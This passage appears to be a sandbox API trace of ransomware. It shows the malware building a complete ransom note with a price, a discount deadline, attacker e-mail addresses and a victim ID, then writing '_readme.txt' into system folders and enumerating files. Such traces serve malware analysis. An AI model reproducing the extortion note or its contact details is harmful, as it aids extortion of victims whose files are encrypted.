50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.546] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.546] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.546] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.546] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.546] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.546] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.546] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.546] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.546] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.546] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.546] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.546] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.547] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.548] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 